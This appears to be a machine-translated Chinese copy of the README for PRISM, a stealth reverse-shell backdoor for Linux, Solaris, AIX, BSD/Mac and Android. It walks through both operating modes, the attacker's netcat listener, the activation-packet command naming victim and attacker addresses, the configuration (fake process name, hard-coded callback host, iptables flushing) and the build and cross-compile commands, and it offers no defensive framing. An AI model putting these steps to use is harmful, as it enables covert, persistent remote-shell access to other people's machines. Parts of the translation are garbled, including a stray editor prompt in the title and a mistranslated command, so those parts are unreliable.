Prism backdoor添加链接描述
棱镜后门
PRISM 是一个用户空间隐身反向 shell 后门。 代码可在 GitHub 。
它已经过全面测试:
Linux
索拉里斯
艾克斯
BSD/Mac
安卓
PRISM 可以以两种不同的方式工作: ICMP 和 STATIC 模式。
ICMP 模式
使用此操作模式后门会在后台静默等待特定的 ICMP 数据包 包含要连接回来的主机/端口和防止第三方访问的私钥。
首先,在攻击者机器上运行 netcat 以等待来自后门的传入连接:
$ nc -l -p 6666
使用 sendPacket.py 脚本(或其他数据包生成器)将激活数据包发送到后门:
./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666
192.168.0.1 是运行prism后门的受害机器
p4ssw0rd 是关键
192.168.0.10 是攻击者机器地址
6666 是攻击者机器端口
后门将连接回netcat!
静态模式
使用这种操作模式,后门会尝试连接到硬编码的 IP/PORT。
在这种情况下,只需在硬编码的机器/端口上运行 netcat 侦听:
$ nc -l -p [端口]
特征
两种操作模式(ICMP 和 STATIC)
运行时进程重命名
没有监听端口
自动 iptables 规则刷新
用纯C编写
没有库依赖
获取代码
git clone https://github.com/andreafabrizi/prism.git
配置
在构建之前,您必须配置编辑源代码的后门。
以下配置参数说明:
静态模式:
REVERSE_HOST : 连接回来的机器地址
REVERSE_PORT : 连接回来的机器端口
RESPAWN_DELAY :每个连接之间的时间,以秒为单位
ICMP 模式:
ICMP_KEY : 激活后门的密钥/密码
通用参数:
MOTD : 在后门连接处打印的消息
SHELL : 要执行的外壳
PROCESS_NAME : 假进程名
建筑
gcc <…OPTIONS…> -Wall -s -o prism prism.c
可用的 GCC 选项:
-DDETACH #后台运行进程
-DSTATIC # 启用 STATIC 模式(默认为 ICMP 模式)
-DNORENAME #不重命名进程
-DIPTABLES #尝试刷新所有iptables规则
例子:
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c
交叉编译
安卓
将外壳更改为 /system/bin/sh
apt-get install gcc-arm-linux-gnueabi
arm-linux-gnueabi-gcc -DSTATIC -DDETACH -DNORENAME -static -march=armv5 prism.c -o prism
Linux 64bit (使用 32bit 主机系统)
apt-get install libc6-dev-amd64
gcc -DDETACH -m64 -Wall -s -o prism prism.c
Linux 32bit (使用 64bit 主机系统)
apt-get install libc6-dev-i386
gcc -DDETACH -m32 -Wall -s -o prism prism.c
后门楼资料
后门忽略任何命令行参数,除了 Inf0 (最后一个字符是数字)。
此选项允许您查看有关后门的一些信息:
$ ./棱镜信息0
版本:0.5
模式:icmp
密钥:p455w0rD
进程名称:[udevd]
外壳:/bin/sh
分离:是
刷新 iptables:否